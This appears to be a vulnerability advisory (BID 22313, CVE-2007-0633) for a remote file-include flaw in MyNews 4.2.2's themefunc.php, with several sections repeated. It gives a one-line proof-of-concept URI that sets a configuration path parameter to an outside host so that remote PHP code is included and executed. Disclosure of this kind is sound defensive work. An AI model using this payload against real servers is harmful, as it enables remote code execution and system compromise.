MyNews Themefunc.PHP Remote File Include Vulnerability
BID:22313
Info
MyNews Themefunc.PHP Remote File Include Vulnerability
| Bugtraq ID: | 22313 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-0633 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 30 2007 12:00AM |
| Updated: | May 12 2015 07:34PM |
| Credit: | GolD_M is credited with the discovery of this vulnerability. |
| Vulnerable: |
T-Systems Solutions for Research GmbH MyNews 4.2.2 |
| Not Vulnerable: | |
Discussion
MyNews Themefunc.PHP Remote File Include Vulnerability
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
Exploit / POC
MyNews Themefunc.PHP Remote File Include Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://www.example2.com
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/include/themes/themefunc.php?myNewsConf[path][sys][index]=http://www.example2.com
Solution / Fix
MyNews Themefunc.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].